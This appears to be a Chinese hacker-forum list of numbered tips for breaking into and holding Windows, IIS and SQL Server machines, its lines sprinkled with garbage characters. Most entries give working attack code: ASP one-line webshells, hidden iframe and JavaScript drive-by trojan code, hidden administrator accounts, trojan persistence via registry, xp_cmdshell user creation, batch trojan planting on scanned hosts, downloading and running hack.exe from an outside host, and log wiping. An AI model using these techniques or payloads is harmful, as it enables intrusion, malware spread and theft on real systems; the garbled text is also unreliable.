1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,) \5 { J1 V/ ]4 T& i2 T2 @, s
cacls C:\windows\system32 /G hqw20:R+ F% D3 Q, }' {# V+ I/ s# p
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
0 P0 F% L, n4 R# r8 S( N7 U" N恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F H5 h4 d& H& {5 o/ F$ }
3 O' s$ @' {; }
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
1 D7 D6 C. S. _# } s% E5 |' K9 F8 e& o3 u/ L8 _
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。7 t2 b" o5 [% L
" E: S% D' [9 y3 @( O% e4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
D; }/ z6 t% f8 z" K1 O1 Z! n5 B. s; j. I! L) J9 X1 [
5、利用INF文件来修改注册表8 S1 Y8 z- f3 s* g7 D. O s: N
[Version]7 W% w. H4 Y8 O; C
Signature="$CHICAGO$"
, v+ |' [! S: c* H: ^" \[Defaultinstall]6 _$ r. [' b' H: J
addREG=Ating5 s. c% l0 Y. G1 Q, g! K
[Ating]
+ s1 {* N, X' j# uHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
+ C+ V5 A z( g( ]4 `9 `3 ~: v以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:) m4 J* R D: K9 ~, B% c
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径6 R) l" v5 m) Y4 Y& [+ ]
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU5 T, D( Y, y1 {% h+ g
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU7 m' F* v1 a6 K l, {+ L
HKEY_CURRENT_CONFIG 简写为 HKCC
0 w. Q+ q+ p2 j7 @+ G" m0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; ] {& D0 f9 Q: h7 O! e
"1"这里代表是写入或删除注册表键值中的具体数据
0 g4 A9 R2 J* p" a2 x
0 o! E" H9 ?8 `4 f6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
% d- K5 j+ F. q2 _4 z9 p) Q) p多了一步就是在防火墙里添加个端口,然后导出其键值6 R5 w. U/ W& G$ X$ f$ K
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]4 n' i; u" H/ Z2 X4 W5 {
* l) ?3 _' r$ {$ s5 w. o& ~
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
! \) A! \# q. u在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。9 q% O+ q* [# i( x, G
4 S8 F( ~3 S( a( Q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
' Q# ] T$ o( i& ^
) F2 ]5 f7 ^* J1 {/ W9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# Q0 T6 [! L- U: g. i可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 w2 H' {, q6 x0 i
. p' `4 b/ c1 `2 k ^10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
( C$ P0 X2 A+ Y" R% T$ t/ i, n2 U: N, t3 ?" C2 a
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ w7 S: n% H% F; z用法:xsniff –pass –hide –log pass.txt; c; L k; j# Y2 I. _
& x2 A& c1 C6 c, K3 G, O12、google搜索的艺术
$ } _9 L5 D. ?6 I搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 P0 ]; t: _/ P或“字符串的语法错误”可以找到很多sql注入漏洞。
. ^' ]# o! `2 O$ V2 N, I* g& t, {' y4 d- O* o+ O( u, Q
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。( K/ O( A+ }, ]2 i* ^
6 S d- d c$ q G
14、cmd中输入 nc –vv –l –p 19879 b( ^! y2 I% T) i; O; e! I3 ?2 ^
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
" N. ]3 ~4 p, r/ M: {* K
* @$ ~' L6 r$ ^5 }15、制作T++木马,先写个ating.hta文件,内容为
% H; t% G8 a- O) b<script language="VBScript"># S5 l O" _% k0 U3 E
set wshshell=createobject ("wscript.shell" )
7 o+ |# G* ?: [ O( A# g' [+ Ha=wshshell.run("你马的名称",1)
: }4 V$ r9 G/ M/ C5 e, xwindow.close7 d( s( f r5 `4 [
</script>; d% w8 i* J C* Q: y4 f* n( @/ t6 b
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
0 s) P2 ?4 @# x9 @5 U
3 e- C& |/ W# V+ y8 _5 r0 W1 T16、搜索栏里输入
+ y8 b \) R* L& d6 Y/ D6 @关键字%'and 1=1 and '%'='
3 z" K3 I$ c: u) T关键字%'and 1=2 and '%'='+ w' W, Z7 m$ v
比较不同处 可以作为注入的特征字符
" i* r# e- Z+ c. u5 @; D
/ r- u+ [- c3 s4 U( h* P17、挂马代码<html>6 e6 i9 v* u' q. M2 m
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 x7 F. |$ h9 t$ F/ Z7 F, k+ i, L</html>$ J. G; X7 {6 ^( L' o
! n& H. j+ j' {5 q& g( n
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
% t0 e; t2 D/ V w* i; P, Snet localgroup administrators还是可以看出Guest是管理员来。2 V0 i* o) a. x
, }% q4 u% U. V( W4 T2 h6 s. R19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等" t9 q% ^+ Q( e9 S) k
用法: 安装: instsrv.exe 服务名称 路径
4 b: q4 o, W5 g+ F9 @卸载: instsrv.exe 服务名称 REMOVE
* W9 b% W7 Y; f; p8 `' {! d
. }+ {, f) X; M. k% j- `* b- r) o- j. ]) X# D$ B
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
" r5 ^; \, n6 W6 L9 Y3 a' n不能注入时要第一时间想到%5c暴库。
& M, j% t* _8 K u3 ]& R, r9 U, |9 b. J/ t8 A2 F/ P: m
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~7 R& n) [# N" e$ y/ D
- ~: a8 d- m& t C+ j1 Q1 V23、缺少xp_cmdshell时
7 m( n: c, `1 C尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 J2 f1 b! G n" B) J* r+ D+ h) P假如恢复不成功,可以尝试直接加用户(针对开3389的)
) s* d X# z. W- g) _! Q! h5 M6 adeclare @o int, R+ _; w4 G, ?: Z- K
exec sp_oacreate 'wscript.shell',@o out1 R9 Q1 W+ C9 q7 _
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
4 L0 j* p9 S3 ]. G
0 f) O4 m- A9 k1 }9 R7 }+ \, S24.批量种植木马.bat8 m- y' {) o4 n' k. [; l
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中3 s4 M9 r4 p' I1 _2 P
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间+ V8 D7 `3 J. ^* n2 j8 K5 O
扫描地址.txt里每个主机名一行 用\\开头
4 F* U1 Y# Q! f9 w! [. [; }2 Q- U0 z% ~ f L2 h% E$ l0 g
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。& n0 o$ u. z) }" L: E/ f# ~
8 j5 c3 d# Q, `/ Q; o1 t: R/ U
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
$ ?* j, l, Q* t将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
7 X' k6 Q! g! \5 B7 }, s.cer 等后缀的文件夹下都可以运行任何后缀的asp木马' q' G, U% \. q, j- q
: q9 M! Q# v. y27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP2 I/ K+ g- V H( ^* E# R
然后用#clear logg和#clear line vty *删除日志
2 l" |, |6 R0 c. Q* U- v( a; Z- l
28、电脑坏了省去重新安装系统的方法
e/ x# l" l7 {! |7 v纯dos下执行,' K% E8 J9 q- g; D; P) L
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
% n, u" E: h: {2 S1 c2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
/ d% o& l, L: t& S- O, N# S0 Z4 a6 P' ~ i1 L: t: v7 g
29、解决TCP/IP筛选 在注册表里有三处,分别是:
, ?! B( y- L' A7 a9 E' C) p7 THKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip- b/ W, k- |5 J5 F
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip9 A% P& `7 o- c0 G0 S( W+ w
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) u- P3 H& ]2 B& E% H" y2 T
分别用5 W/ J3 A @5 H! I
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ j* }% ^) k3 B: ^$ q& xregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip/ J" d5 T6 }- r5 M% ~5 K
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 ]1 z* c e6 S: _5 t
命令来导出注册表项! ]0 w; G$ L3 G1 U
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
, r9 J# ^+ O* u0 `: k1 W改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
5 v, Y, ]* O1 a* v. |. P% A2 l5 \regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
5 R- s6 _6 H6 y6 ^2 o2 d. ^/ h8 \' z" A# B
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
# p$ O: y4 ?9 I/ ~& w" sSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的33 _; S% X7 K; \
: G+ v9 [9 l/ ]% f% g- ]% x# F
31、全手工打造开3389工具
; l( b& G) V: K. Q* l1 j打开记事本,编辑内容如下:
2 r2 [% D& v( O1 {2 l3 _7 k2 B# B; fecho [Components] > c:\sql0 J7 u7 {/ X) N
echo TSEnable = on >> c:\sql" T0 `7 J' s/ P/ t/ R8 t
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 b' n0 E0 _5 F0 f. E: u编辑好后存为BAT文件,上传至肉鸡,执行
* c& }$ ~, D, H, Z
% J& w% j0 Z ~* k9 {' b32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
# G ~% W, a- b0 x- y4 s' \, S1 e* g$ m6 G" L
33、让服务器重启
" f# P0 t# C3 c( o4 E0 `写个bat死循环:& Z( O" `$ h5 M& N- L& b, t8 ^% n
@echo off+ f" o6 D4 u0 y/ }% T2 W
:loop1
5 k% Q+ ~7 p3 U7 E% D# ucls
' f$ o+ h6 N6 s0 S4 r' K; sstart cmd.exe
1 \* G# }- }1 x4 {6 I6 l( Tgoto loop1: a- T# n0 [1 r/ p
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 S9 [) e K" z
! P/ F3 e `( a* |$ |34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,! [6 s; Q9 ? W9 k
@echo off: U1 y( W+ ^' Y6 r! J
date /t >c:/3389.txt
1 A7 t" p. [( mtime /t >>c:/3389.txt
& n- P5 e, q: y" Y* H6 s% Sattrib +s +h c:/3389.bat d: c( _0 ?2 W6 r, \& I% g
attrib +s +h c:/3389.txt: b! u4 U' _4 s
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& w% R1 N( v: X% g4 v0 \/ W: H8 a并保存为3389.bat
$ r1 A3 c; T1 `5 r- W6 c打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号( n' c# Y" Z# ?8 Y9 r
: m' t3 f4 m; u" s1 _& B+ H
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
u& o, Z- S4 l5 Tstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)0 ]% |0 c( I; J; S- T" z0 i
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
4 S! i0 |$ K0 G8 m A. W
3 }1 X1 |. t' C* y36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件. v! x" K& K4 t/ L
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 O* f M2 V1 t: Aecho 你的FTP账号 >>c:\1.bat //输入账号" f2 A; J1 ~ [$ O0 O1 u
echo 你的FTP密码 >>c:\1.bat //输入密码$ Z* W. h3 ?% p! q: v
echo bin >>c:\1.bat //登入
9 S& {6 L' I7 n0 c$ H2 \echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
, I1 M3 G' ` |5 j2 v* W! A. Uecho bye >>c:\1.bat //退出 n0 K2 Z4 [2 b2 U9 a; U
然后执行ftp -s:c:\1.bat即可
7 E( }9 _& T0 D$ c! k
% q7 O+ F; C8 K, N6 A37、修改注册表开3389两法
7 ^# `' x6 d% D$ j(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表5 Z8 o% d! A% U4 D
echo Windows Registry Editor Version 5.00 >>3389.reg4 l* R3 i& G0 Q4 X2 D( U u5 m/ l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg/ ?" [- u- U' Q d2 O* {" u7 ^
echo "Enabled"="0" >>3389.reg
8 P! U0 Q* D- {% }0 techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
9 b+ ?: w: {% o7 J: w* ?; P0 X' Z$ YNT\CurrentVersion\Winlogon] >>3389.reg
1 |/ M- q3 h) B/ R. @echo "ShutdownWithoutLogon"="0" >>3389.reg2 O7 g0 o4 W0 W' N( V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]3 W) _7 f! S3 g, |5 ^2 f V
>>3389.reg
, ~* x; W v% n3 ]& iecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
V8 |$ q1 r5 l2 E; N8 W' Z1 N0 K# Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
8 Z4 a9 f- J: e& B8 C>>3389.reg
. _) i& v1 p# c: D0 Becho "TSEnabled"=dword:00000001 >>3389.reg! d: I' a0 E+ f* q+ T# J2 X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
8 _" e# r0 L3 \echo "Start"=dword:00000002 >>3389.reg% h' w- ?# c+ t7 S( z. ~0 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; K4 v4 F) M& a4 E
>>3389.reg5 @% ~" k6 i8 m1 |# k) x
echo "Start"=dword:00000002 >>3389.reg4 ~: a5 ~, l6 K' ]+ p, E9 t
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ }+ p- n! j- m
echo "Hotkey"="1" >>3389.reg
$ c, h/ h- k- ?+ M5 ^9 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% u' n8 U0 Q" I7 j- l% e& ]Server\Wds\rdpwd\Tds\tcp] >>3389.reg. e2 \& X0 ~: ]8 _$ n
echo "PortNumber"=dword:00000D3D >>3389.reg
6 x. |: D9 r# H' A' ~ h+ D8 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" \! ?% v3 p6 \Server\WinStations\RDP-Tcp] >>3389.reg, O1 v# D2 g1 N" w# l
echo "PortNumber"=dword:00000D3D >>3389.reg
9 p$ }7 ?1 y9 D/ V6 A7 P把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。: } Y% j% V# V \6 H: S8 f7 a
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* ?( [5 F- P3 ]9 g+ I4 i' ~
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效) W7 j9 _1 z; @) C B- W
(2)winxp和win2003终端开启
7 y7 N; ?% K; S) w: i用以下ECHO代码写一个REG文件:
9 m, |8 e* p, d% |# I& becho Windows Registry Editor Version 5.00>>3389.reg
8 \9 n3 Y2 X0 U0 Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. B+ C/ n. |7 d! q! [Server]>>3389.reg( F2 q, v( ~% I* H) R) a
echo "fDenyTSConnections"=dword:00000000>>3389.reg8 A" h D* p T, u8 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
B- W/ M# L( r4 K" o8 rServer\Wds\rdpwd\Tds\tcp]>>3389.reg
3 n0 m! ^5 j, X# oecho "PortNumber"=dword:00000d3d>>3389.reg$ V2 u/ f* p2 t/ m( ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 l @ x3 P" x8 ^6 w
Server\WinStations\RDP-Tcp]>>3389.reg
# A* \5 w+ @( j' R9 becho "PortNumber"=dword:00000d3d>>3389.reg' y3 p! l" `0 `$ c; A' j6 r6 ^
然后regedit /s 3389.reg del 3389.reg
; M& a9 [9 r$ d! qXP下不论开终端还是改终端端口都不需重启0 J8 G: A+ z, m( o1 t
5 f! M% y: K3 H$ {7 a7 x
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃% n7 q) R' d+ r
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'* N! p( P+ e$ J6 [9 H' e
2 R/ B7 o* U& s5 \3 a9 w5 _; W# C
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!, D. g; x- S" B v5 D3 C! M
(1)数据库文件名应复杂并要有特殊字符
7 a; S# t/ q5 E: Z/ M$ q(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
( U% X4 a. c3 ?# g/ X- j将conn.asp文档中的9 \% w v. O1 f: B# `- }' Q1 x
DBPath = Server.MapPath("数据库.mdb")
# m" c& y0 ]8 R" s b+ D2 U. Wconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
- j: E3 g& @' Q7 Q
+ T3 R7 R. n& g$ K修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置3 O6 h5 h x( n' | W
(3)不放在WEB目录里7 }3 z+ {5 I C; x5 N- `7 s1 K/ s
0 k# I9 t" F9 }! S
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉( D" L' C* ~ z( i, @
可以写两个bat文件
9 t" l, \ f8 R c3 l@echo off
% P0 c% P/ \# F, S* K3 Z8 d@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
6 {8 |! R5 k$ I; I% W# D( Q@del c:\winnt\system32\query.exe
2 u+ i0 v+ K1 S@del %SYSTEMROOT%\system32\dllcache\query.exe
7 {" j( z5 A4 Q( J. f@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的- p" n$ x, v9 @
% t0 C& ]/ U% R7 b) T: j
@echo off7 C2 k, Y2 j3 x9 n, j: {
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe' i" k% y' }" Q8 Y" Y/ F: e$ y
@del c:\winnt\system32\tsadmin.exe9 e* H v' `1 [. I
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
R% {/ S* Y0 I) T/ a3 I
9 p7 T+ N% }: a M, C/ R41、映射对方盘符
/ [3 {5 S& r/ vtelnet到他的机器上,
! ^) x E; J' y6 Wnet share 查看有没有默认共享 如果没有,那么就接着运行
) M; N- B* I. Enet share c$=c:
4 J6 F$ R6 v- Q! o- d- _* nnet share现在有c$
) I F8 {# |+ R& I在自己的机器上运行
8 ~7 K7 Y4 A- k2 ?% E4 ^, z' inet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
% ], U8 p1 r. m* K5 u" \
6 R! I# t4 c! \% w g( e- o6 v: X42、一些很有用的老知识 Y* g# x4 p) n& A7 O) h! N& Z
type c:\boot.ini ( 查看系统版本 )$ D+ l, m, r, b$ V
net start (查看已经启动的服务)' o6 R9 N, i+ ~2 O* V) `
query user ( 查看当前终端连接 )
8 b; {% m% m6 W. V2 D. Cnet user ( 查看当前用户 )3 g/ W9 `; f! b% {. z* H" i9 }# t( E
net user 用户 密码/add ( 建立账号 )( k0 ^$ H* V7 d
net localgroup administrators 用户 /add (提升某用户为管理员)% r0 z, \& _9 Y, Z
ipconfig -all ( 查看IP什么的 )4 y+ X" D: P6 `2 { _5 y& c A
netstat -an ( 查看当前网络状态 ), {3 \3 i4 x$ }8 E( B7 \
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
8 c2 _$ b# Y+ Y9 F8 n克隆时Administrator对应1F4- L% \1 P4 W# v8 t
guest对应1F5: d# k* t P# L- V
tsinternetuser对应3E8
$ `. r; G6 L+ _1 q# k+ o
) `1 q) Z* k$ g% M43、如果对方没开3389,但是装了Remote Administrator Service
2 K, ^2 y) J% H: Q+ b9 G- S& I% l: P用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接. U5 B, o+ N3 u' |0 r, r
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息! c% ~& a1 V1 Q. d: R! j( w
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
; T3 E5 q3 ` _- g" @# M) `' r( u8 h. T
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)7 ]9 y: c9 @3 E# N: V3 \
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
% {8 \1 j/ ]. |9 R# ^" ?
! L; z. A+ P8 v* z: K" T45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)" x K, v* G# H4 a# c4 e. W
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open4 ?. S1 `3 q* E# ?
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =* S- R w' @, C. N: V4 L
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
5 @+ w) q: x! t* ~2 X1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs( W; A$ ]" m2 s- ~! B) z, ?( W* z
(这是完整的一句话,其中没有换行符)' n( `; y# M; }0 t, [
然后下载:
( Q& u- R! X+ B7 L- Vcscript down.vbs http://www.hack520.org/hack.exe hack.exe( k3 n7 b$ R; c* v% X! Z6 Q- T
; l0 {- B& \( _+ }; w
46、一句话木马成功依赖于两个条件:
; \0 s+ q9 w8 Q% Z3 P7 `5 A1、服务端没有禁止adodb.Stream或FSO组件- m r0 ?9 F- N! M" W" H# ^
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 c+ |. B. o- z" T3 ]" m
0 z8 _2 j9 w: c6 i" k47、利用DB_OWNER权限进行手工备份一句话木马的代码:
w$ b% Y* B, ^5 o7 [;alter database utsz set RECOVERY FULL--
- K/ ?9 g9 f" H( \3 K+ ~;create table cmd (a image)--8 B0 U% m& X1 G( [ _1 A
;backup log utsz to disk = 'D:\cmd' with init--9 E7 M3 Z- ~1 j3 a
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
1 w7 Y2 X6 s+ t7 j* h;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
/ E: \( f; w0 {) W: y注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。& C) U, p: o' A6 p# b9 Y8 b6 }/ D
- I* f: n k4 ?48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:8 I S" ^! G( P. T" E8 @. x
; p- {; f, \; ^' F' V
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
+ v5 a, x, l9 A0 O' D! X) ]所有会话用 'all'。( O- |# e0 H! e8 u5 `+ D& ?' w; m* u7 m
-s sessionid 列出会话的信息。
) X. D5 ?. k% u-k sessionid 终止会话。. D" }0 L$ s) I, k+ d
-m sessionid 发送消息到会话。
" Z6 C v" j0 q* H' p
7 W* p5 ~7 Q. k! jconfig 配置 telnet 服务器参数。
6 N" F" {6 f- e" X2 a
* T4 r% e; [& }common_options 为:6 y6 B9 d7 d; o, ` t
-u user 指定要使用其凭据的用户
7 m2 A0 _: B$ O- B-p password 用户密码" B4 d w, ^* [
3 E2 o! Q* ?1 {3 t8 P
config_options 为:. ^( K( Q. F; W2 ^/ i
dom = domain 设定用户的默认域0 |+ H6 z @! o0 F; a( @
ctrlakeymap = yes|no 设定 ALT 键的映射
2 n6 F. o' h/ T5 Ptimeout = hh:mm:ss 设定空闲会话超时值
! @0 D2 d- X% U6 R" `, n, |- n, O( Ltimeoutactive = yes|no 启用空闲会话。% \3 p, r9 q- p
maxfail = attempts 设定断开前失败的登录企图数。9 T% Q6 v; C+ Q6 C, f& x7 ^# Y2 L* S
maxconn = connections 设定最大连接数。
- D7 r9 n) f& F; c% u8 q2 z- Wport = number 设定 telnet 端口。
3 p7 y q2 n$ A1 ]: D: p! K, @8 asec = [+/-]NTLM [+/-]passwd
# J' \( X6 {0 d/ p0 ?& [0 Q设定身份验证机构1 y9 t6 @2 r! E* C* E8 a
fname = file 指定审计文件名。, [7 N3 Q. Y) m
fsize = size 指定审计文件的最大尺寸(MB)。% A% _$ q/ {/ w0 _1 f0 d3 c, F
mode = console|stream 指定操作模式。- d8 n1 G2 @7 J. r2 l
auditlocation = eventlog|file|both
% V/ X3 x) C2 D9 s0 U) P7 Q+ A指定记录地点3 m. B t& Z# R V% i, P @
audit = [+/-]user [+/-]fail [+/-]admin% y, ~3 g) R4 A& ?2 a7 l' M. E
4 d. P8 W! r" x u( c49、例如:在IE上访问:
& Z) i$ Y8 Z8 }; [: g. ]www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
8 p! {+ c7 K7 _0 @$ i0 ]/ `: |# ohack.txt里面的代码是:
4 ?: p- {: f5 a8 Y<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">( }" q' A) n7 f
把这个hack.txt发到你空间就可以了!0 a* ?% @8 c: K! |8 m6 O9 i
这个可以利用来做网马哦!
/ C2 w: W7 Q0 W4 r- ]( g+ P3 t+ l# t
50、autorun的病毒可以通过手动限制!% J. L) g6 m" ~ ]
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!: Q( Z# H) g) i( P
2,打开盘符用右键打开!切忌双击盘符~! ^9 u2 X9 ]7 K8 m7 s
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
$ D' d% c: o, i% N; f
0 G# a& [% f9 f6 ^2 E/ u5 f/ u51、log备份时的一句话木马:
' f! _0 q* d( ^; ?8 `, ?a).<%%25Execute(request("go"))%%25>
1 o1 `& F4 w. d" }b).<%Execute(request("go"))%>9 @" M! ?+ ]7 Y
c).%><%execute request("go")%><%
, d7 c( L; p! F0 E' ]! j8 {4 ]8 C8 ^d).<script language=VBScript runat=server>execute request("sb")</Script>
& I9 `: G/ \% L D! ye).<%25Execute(request("l"))%25>
- q# v, S0 g3 Af).<%if request("cmd")<>"" then execute request("pass")%>. c2 j, E( E& w
6 \; G" ~2 e: _% {
52、at "12:17" /interactive cmd
4 w, W4 C! [# l- @* W执行后可以用AT命令查看新加的任务
% p& U# y" Y" R6 Q" ~1 i用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。5 j) P8 k C+ P6 @
8 D/ r0 ?( b: `, h4 A q3 L$ O. Q53、隐藏ASP后门的两种方法! Z. ]" b( O6 ?1 w2 P
